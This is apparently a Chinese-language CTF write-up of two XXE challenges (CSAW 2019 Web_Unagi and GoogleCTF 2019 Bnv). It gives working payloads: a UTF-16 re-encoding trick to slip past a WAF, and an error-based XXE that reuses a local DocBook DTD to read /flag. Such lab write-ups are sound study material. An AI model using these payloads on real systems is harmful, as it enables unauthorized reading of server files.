XXE题型记录

XXE题型记录

[CSAWQual 2019]Web_Unagi

题解

打开题目，点开upload中的例子发现是上传xml文件

根据about中的提示Flag is located at /flag, come get it

先构造常规的xml文件上传发现被WAF，用utf-16绕过

cat rat.xml | iconv -f UTF-8 -t UTF-16BE > rbt16.xml

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>gg</username>
        <password>passwd1</password>
        <name>ggg</name>
        <email>alice@fakesite.com</email>  
        <group>CSAW2019</group>
        <intro>&xxe;</intro>
    </user>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>bob@fakesite.com</email>  
        <group>CSAW2019</group>
        <intro>&xxe;</intro>
    </user>
</users>

上传rbt16.xml在User得到flag

end

[GoogleCTF2019 Quals]Bnv

学习资料

1.Blind-XXE

2.write-up

题解

当Web应用采用JSON进行数据传输时,可能存在XXE漏洞。

(第二个油管视频有整个题目的解题思路和过程，看着做的就不照搬了=w=)

Payload

<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
    <!ENTITY % ISOamso '
        <!ENTITY &#x25; file SYSTEM "file:///flag">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;test&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
    '>
    %local_dtd;
]>